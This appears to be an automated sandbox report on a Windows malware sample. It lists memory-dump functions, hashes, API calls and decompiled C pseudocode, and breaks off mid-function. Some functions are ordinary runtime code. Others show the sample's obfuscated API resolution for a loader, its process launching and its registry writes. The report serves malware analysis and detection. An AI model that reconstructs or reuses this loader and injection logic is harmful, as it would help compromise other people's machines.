Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
String ID:
API String ID: 3869368768-0
Opcode ID: 149c5aae32532379ee9ab7c12b45de861af977d4f4e61cc160fd932d2147254c
Instruction ID: 9d7816aefc557e95226af2557501fead26d0dc5e5da37e7f149edd8d75877735
Opcode Fuzzy Hash: 149c5aae32532379ee9ab7c12b45de861af977d4f4e61cc160fd932d2147254c
Instruction Fuzzy Hash: DB510DB5E00248EFDB14CFD4C850BDEBBB9BF49314F108529E819AB385D731A989CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6FEA, Relevance: 12.1, APIs: 8, Instructions: 77COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 6E1D6FF9
__decode_pointer.LIBCMT ref: 6E1D7009

Part of subcall function 6E1DAC7A: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DACB9
Part of subcall function 6E1DAC7A: __crt_waiting_on_module_handle.LIBCMT ref: 6E1DACC4
Part of subcall function 6E1DAC7A: GetProcAddress.KERNEL32(00000000,6E1FDE6C), ref: 6E1DACD4

__msize.LIBCMT ref: 6E1D7027
__realloc_crt.LIBCMT ref: 6E1D704B
__realloc_crt.LIBCMT ref: 6E1D7061
__encode_pointer.LIBCMT ref: 6E1D7073
__encode_pointer.LIBCMT ref: 6E1D7081
__encode_pointer.LIBCMT ref: 6E1D708C

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__msize
String ID:
API String ID: 1462085885-0
Opcode ID: 421d13213a38d08f73429c71f647deb47a7df6cb4f2de4072cd0c2b31683ce71
Instruction ID: 2d3159ee4e6a9cbf5a2163ca0c512ce6c3ef675c20a20a4ec499b8c3cbe86f92
Opcode Fuzzy Hash: 421d13213a38d08f73429c71f647deb47a7df6cb4f2de4072cd0c2b31683ce71
Instruction Fuzzy Hash: 3311D67360461AAFAB15DBB9DC548DD3BEEFA422A47240427E404D71D0FF22DDC9A650

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3DFC, Relevance: 12.0, APIs: 8, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D3E03
std::_Lockit::_Lockit.LIBCPMT ref: 6E1D3E0D
int.LIBCPMTD ref: 6E1D3E24

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

codecvt.LIBCPMT ref: 6E1D3E47
std::bad_exception::bad_exception.LIBCMT ref: 6E1D3E5B
__CxxThrowException@8.LIBCMT ref: 6E1D3E69
std::locale::facet::_Incref.LIBCPMTD ref: 6E1D3E79
std::locale::facet::facet_Register.LIBCPMT ref: 6E1D3E7F

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$Exception@8H_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
String ID:
API String ID: 1213051545-0
Opcode ID: 9ffca47bd1bbfc1de682883c1986158b910516e165fd9dd4921d0e22ea5e74d3
Instruction ID: 0871e79236cb69b46e38c73c00404bde10ecb0da6678f626a65ca2006bb922e2
Opcode Fuzzy Hash: 9ffca47bd1bbfc1de682883c1986158b910516e165fd9dd4921d0e22ea5e74d3
Instruction Fuzzy Hash: 980165318005199BCF05DBE0C855AEEB33EBF90628F640919D121AB2D0DF789A8AF791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3BDD, Relevance: 12.0, APIs: 8, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D3BE4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1D3BEE
int.LIBCPMTD ref: 6E1D3C05

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

ctype.LIBCPMT ref: 6E1D3C28
std::bad_exception::bad_exception.LIBCMT ref: 6E1D3C3C
__CxxThrowException@8.LIBCMT ref: 6E1D3C4A
std::locale::facet::_Incref.LIBCPMTD ref: 6E1D3C5A
std::locale::facet::facet_Register.LIBCPMT ref: 6E1D3C60

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$Exception@8H_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
String ID:
API String ID: 1593823581-0
Opcode ID: c92916f1788c7eb43e247fd3a3f036f4c395539a8fb6de3a81ba5cd6edeada9c
Instruction ID: 5c0dd25bdb36a49be9b0b5ea46e723c9460e4cdf0d8514f21aeac28b5bf3f8c4
Opcode Fuzzy Hash: c92916f1788c7eb43e247fd3a3f036f4c395539a8fb6de3a81ba5cd6edeada9c
Instruction Fuzzy Hash: 1F0184728005199BCB05DBE4C945AEEB33EBF50768F600919D020AB2D0DF749ACAF791

Uniqueness

Uniqueness Score: -1.00%

Function 02EA8EA1, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02EA8EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02EA592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02EAA749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2ead260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2ead2a8; // 0xb1a5a8
					_t18 = _t47 + 0x2eae3e6; // 0x73797325
					_t68 = E02EA3C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2ead2a8; // 0xb1a5a8
						_t19 = _t50 + 0x2eae747; // 0x39c8cef
						_t20 = _t50 + 0x2eae0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02EAA62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02EAA62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2ead238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02EAA734(_t70);
				goto L12;
			}

0x02ea8ea9
0x02ea8ea9
0x02ea8eb8
0x02ea8ebf
0x02ea8ec4
0x02ea8fd1
0x02ea8fd8
0x02ea8fd8
0x02ea8ed3
0x02ea8edb
0x02ea8ede
0x02ea8ee3
0x02ea8ef8
0x02ea8efe
0x02ea8eff
0x02ea8f02
0x02ea8f08
0x02ea8f0b
0x02ea8f10
0x02ea8f18
0x02ea8f24
0x02ea8f28
0x02ea8fb8
0x02ea8f2e
0x02ea8f2e
0x02ea8f33
0x02ea8f3a
0x02ea8f4e
0x02ea8f52
0x02ea8fa1
0x02ea8f54
0x02ea8f55
0x02ea8f5c
0x02ea8f75
0x02ea8f77
0x02ea8f7b
0x02ea8f82
0x02ea8f9c
0x02ea8f84
0x02ea8f8d
0x02ea8f92
0x02ea8f92
0x02ea8f82
0x02ea8fb0
0x02ea8fb0
0x02ea8f28
0x02ea8fbf
0x02ea8fc8
0x02ea8fcc
0x00000000

APIs

Part of subcall function 02EA592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02EA8EBD,?,00000001,?,?,00000000,00000000), ref: 02EA5952
Part of subcall function 02EA592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02EA5974
Part of subcall function 02EA592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02EA598A
Part of subcall function 02EA592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02EA59A0
Part of subcall function 02EA592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02EA59B6
Part of subcall function 02EA592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02EA59CC

memset.NTDLL ref: 02EA8F0B

Part of subcall function 02EA3C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02EA8F24,73797325), ref: 02EA3C59
Part of subcall function 02EA3C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02EA3C73

GetModuleHandleA.KERNEL32(4E52454B,039C8CEF,73797325), ref: 02EA8F41
GetProcAddress.KERNEL32(00000000), ref: 02EA8F48
HeapFree.KERNEL32(00000000,00000000), ref: 02EA8FB0

Part of subcall function 02EAA62D: GetProcAddress.KERNEL32(36776F57,02EAA2D4), ref: 02EAA648

CloseHandle.KERNEL32(00000000,00000001), ref: 02EA8F8D
CloseHandle.KERNEL32(?), ref: 02EA8F92
GetLastError.KERNEL32(00000001), ref: 02EA8F96

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 1c9664b1be7eb80b9d66c637f014bc85ed412731caba561204dd0e9943c56542
Instruction ID: e3d239a6bee9678706a30d90bbc4781568ea518131bb67967c57d298aebf71af
Opcode Fuzzy Hash: 1c9664b1be7eb80b9d66c637f014bc85ed412731caba561204dd0e9943c56542
Instruction Fuzzy Hash: 2E314EB6C80209AFDB10EFA5CC989DEBBB9EB04304F549465F605AB210D735BA54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CE8B0, Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6E1CE912

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 10059899d56e9d594106df0b1951fb06e436ed501da2cabf923a2b67adfcdf17
Instruction ID: 3cec50ac69d8f08296cdc263d1917b6385b913009a3c50e9b72b2c4d9d3a3280
Opcode Fuzzy Hash: 10059899d56e9d594106df0b1951fb06e436ed501da2cabf923a2b67adfcdf17
Instruction Fuzzy Hash: A3415B71810518DFDB14CBD4CC92FEDF375BB24714F108A9A941AAB284DB34AB85DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02EA1BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2ead2a8; // 0xb1a5a8
				_t1 = _t9 + 0x2eae62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02EA173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02EAA71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02EA64EF(_t34, _t41, _a8);
						E02EAA734(_t41);
						_t42 = E02EA6467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02EAA734(_t36);
							_t36 = _t42;
						}
						_t43 = E02EA17E5(_t36, _t33);
						if(_t43 != 0) {
							E02EAA734(_t36);
							_t36 = _t43;
						}
					}
					E02EAA734(_t28);
				}
				return _t36;
			}

0x02ea1bb6
0x02ea1bb9
0x02ea1bba
0x02ea1bc2
0x02ea1bc9
0x02ea1bd0
0x02ea1bd4
0x02ea1bda
0x02ea1be1
0x02ea1be6
0x02ea1bf8
0x02ea1bfc
0x02ea1c00
0x02ea1c06
0x02ea1c0b
0x02ea1c1b
0x02ea1c1d
0x02ea1c34
0x02ea1c38
0x02ea1c3b
0x02ea1c40
0x02ea1c40
0x02ea1c49
0x02ea1c4d
0x02ea1c50
0x02ea1c55
0x02ea1c55
0x02ea1c4d
0x02ea1c58
0x02ea1c58
0x02ea1c63

APIs

Part of subcall function 02EA173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,02EA1BD0,253D7325,00000000,00000000,7742C740,?,?,02EA20C2,?), ref: 02EA17A4
Part of subcall function 02EA173D: sprintf.NTDLL ref: 02EA17C5

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02EA20C2,?,039C95B0), ref: 02EA1BE1
lstrlen.KERNEL32(?,?,?,02EA20C2,?,039C95B0), ref: 02EA1BE9

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

strcpy.NTDLL ref: 02EA1C00
lstrcat.KERNEL32(00000000,?), ref: 02EA1C0B

Part of subcall function 02EA64EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02EA1C1A,00000000,?,?,?,02EA20C2,?,039C95B0), ref: 02EA6506

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02EA20C2,?,039C95B0), ref: 02EA1C28

Part of subcall function 02EA6467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02EA1C34,00000000,?,?,02EA20C2,?,039C95B0), ref: 02EA6471
Part of subcall function 02EA6467: _snprintf.NTDLL ref: 02EA64CF

Strings

=, xrefs: 02EA1C22

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: b7b60e0cde3b2dce7c39dc235e3be8d49ab7210402cc1a9115c39dfad93a0758
Instruction ID: 3d89bb625982f3fd5ca9586b4ca50b045df7b0f6f5c16a5fda9cf00024f0dc96
Opcode Fuzzy Hash: b7b60e0cde3b2dce7c39dc235e3be8d49ab7210402cc1a9115c39dfad93a0758
Instruction Fuzzy Hash: 9111E3379C1224674B12BBB48CA4CAF36BE9F45764716A025F6089F200DF24FC029BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA6891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02EA68EB
SysAllocString.OLEAUT32(0070006F), ref: 02EA68FF
SysAllocString.OLEAUT32(00000000), ref: 02EA6911
SysFreeString.OLEAUT32(00000000), ref: 02EA6979
SysFreeString.OLEAUT32(00000000), ref: 02EA6988
SysFreeString.OLEAUT32(00000000), ref: 02EA6993

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 6ae42663f64002372afd2f78c3581a12d45de9ec827a3a1e369fbb819121d5d3
Instruction ID: c00a3007d8d6c95da16dea65604b4f37d99d5a33ea36f1efde019eeee5c4bb4e
Opcode Fuzzy Hash: 6ae42663f64002372afd2f78c3581a12d45de9ec827a3a1e369fbb819121d5d3
Instruction Fuzzy Hash: 05419E32D40609AFDF01DFB9C854A9EB7BABF49304F189426E914EF220DB71A905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02EA592D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02EAA71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2ead2a8; // 0xb1a5a8
					_t1 = _t23 + 0x2eae11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2ead2a8; // 0xb1a5a8
					_t2 = _t26 + 0x2eae769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02EAA734(_t54);
					} else {
						_t30 =  *0x2ead2a8; // 0xb1a5a8
						_t5 = _t30 + 0x2eae756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2ead2a8; // 0xb1a5a8
							_t7 = _t33 + 0x2eae40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2ead2a8; // 0xb1a5a8
								_t9 = _t36 + 0x2eae4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2ead2a8; // 0xb1a5a8
									_t11 = _t39 + 0x2eae779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02EA6604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02ea593c
0x02ea5940
0x02ea5a02
0x02ea5946
0x02ea5946
0x02ea594b
0x02ea595e
0x02ea5960
0x02ea5965
0x02ea596d
0x02ea5974
0x02ea5976
0x02ea597b
0x02ea59fa
0x02ea59fb
0x02ea597d
0x02ea597d
0x02ea5982
0x02ea598a
0x02ea598c
0x02ea5991
0x00000000
0x02ea5993
0x02ea5993
0x02ea5998
0x02ea59a0
0x02ea59a2
0x02ea59a7
0x00000000
0x02ea59a9
0x02ea59a9
0x02ea59ae
0x02ea59b6
0x02ea59b8
0x02ea59bd
0x00000000
0x02ea59bf
0x02ea59bf
0x02ea59c4
0x02ea59cc
0x02ea59ce
0x02ea59d3
0x00000000
0x02ea59d5
0x02ea59db
0x02ea59e0
0x02ea59e7
0x02ea59ec
0x02ea59f1
0x00000000
0x02ea59f3
0x02ea59f6
0x02ea59f6
0x02ea59f1
0x02ea59d3
0x02ea59bd
0x02ea59a7
0x02ea5991
0x02ea597b
0x02ea5a10

APIs

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02EA8EBD,?,00000001,?,?,00000000,00000000), ref: 02EA5952
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02EA5974
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02EA598A
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02EA59A0
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02EA59B6
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02EA59CC

Part of subcall function 02EA6604: memset.NTDLL ref: 02EA6683

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 34a71a59e66f52e2b5b9e7e10b090d778ae81b2cc253c36231b5d4628ffccabb
Instruction ID: f1f8f7712ea0588369fd6fedd6a62323366dfdcc0f919275e0e2bd4731a5130f
Opcode Fuzzy Hash: 34a71a59e66f52e2b5b9e7e10b090d778ae81b2cc253c36231b5d4628ffccabb
Instruction Fuzzy Hash: 822160B4A8070AAFD710DF6ACC94D96B7ECEF043087469526F509CB220E774FA49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D8290, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6E1D82B8

Part of subcall function 6E1D6431: __getptd.LIBCMT ref: 6E1D643F
Part of subcall function 6E1D6431: __getptd.LIBCMT ref: 6E1D644D

__getptd.LIBCMT ref: 6E1D82C2

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D82D0
__getptd.LIBCMT ref: 6E1D82DE
__getptd.LIBCMT ref: 6E1D82E9
_CallCatchBlock2.LIBCMT ref: 6E1D830F

Part of subcall function 6E1D64D6: __CallSettingFrame@12.LIBCMT ref: 6E1D6522

Part of subcall function 6E1D83B6: __getptd.LIBCMT ref: 6E1D83C5
Part of subcall function 6E1D83B6: __getptd.LIBCMT ref: 6E1D83D3

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: d4d9ddd75267794bb2dc1c8719d77f810e5e24a8f0620d045c8e4b5e46c92a64
Instruction ID: f865f345b9e65ab562136507cde0884e38f78843ff439cc5d87033569feee633
Opcode Fuzzy Hash: d4d9ddd75267794bb2dc1c8719d77f810e5e24a8f0620d045c8e4b5e46c92a64
Instruction Fuzzy Hash: 7411A7B1C00209DFDB01DFE4C544AEE7BB9FF04318F108969E814A7250EB789A59EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1700, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 269COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6E1D172F

Part of subcall function 6E1CE4D0: std::locale::locale.LIBCPMTD ref: 6E1CE4EA

Part of subcall function 6E1D1F70: std::_Lockit::_Lockit.LIBCPMT ref: 6E1D1F9A
Part of subcall function 6E1D1F70: int.LIBCPMTD ref: 6E1D1FB3

Part of subcall function 6E1CE200: std::locale::facet::_Decref.LIBCPMTD ref: 6E1CE216

numpunct.LIBCPMTD ref: 6E1D1769
_memmove_s.LIBCMT ref: 6E1D1868
std::ios_base::width.LIBCPMTD ref: 6E1D19DA

Strings

@, xrefs: 6E1D18E1

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: DecrefLockitLockit::__memmove_snumpunctstd::_std::ios_base::getlocstd::ios_base::widthstd::locale::facet::_std::locale::locale
String ID: @
API String ID: 3659140288-2766056989
Opcode ID: d7c9a8195c05875df4850439fb9ce50fd5352511f08eb7f2e3fb56595c7d5fd5
Instruction ID: cf9427d85de8a056804b0bf8f891f0c487a5ee7b30a7c21ff13fcb4322b78fef
Opcode Fuzzy Hash: d7c9a8195c05875df4850439fb9ce50fd5352511f08eb7f2e3fb56595c7d5fd5
Instruction Fuzzy Hash: 65B13B71A041499FCB04CF98C990AEEBBFABF49304F20865DE919A7351D734A985DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02EA853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02EA853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2ead33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E02EA9070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02EA6E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02EAA734(_a8);
						goto L29;
					}
					_t64 =  *0x2ead278; // 0x39c9a98
					_t16 = _t64 + 0xc; // 0x39c9b66
					_t65 = E02EA9070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02eac0
						if(E02EA22F1(_t97,  *_t33, _t91, _a8,  *0x2ead334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2ead2a8; // 0xb1a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2eaea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2eae8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E02EA6C38(_t69,  *0x2ead334,  *0x2ead338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2ead2a8; // 0xb1a5a8
									_t44 = _t71 + 0x2eae846; // 0x74666f53
									_t73 = E02EA9070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02eac0
										E02EA5D7D( *_t47, _t91, _a8,  *0x2ead338, _a24);
										_t49 = _t101 + 0x10; // 0x3d02eac0
										E02EA5D7D( *_t49, _t91, _t99,  *0x2ead330, _a16);
										E02EAA734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02eac0
									E02EA5D7D( *_t40, _t91, _a8,  *0x2ead338, _a24);
									_t43 = _t101 + 0x10; // 0x3d02eac0
									E02EA5D7D( *_t43, _t91, _a8,  *0x2ead330, _a16);
								}
								if( *_t101 != 0) {
									E02EAA734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02eac0
					_t81 = E02EA8BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02eac0
							E02EA22F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02EAA734(_t100);
						_t98 = _a16;
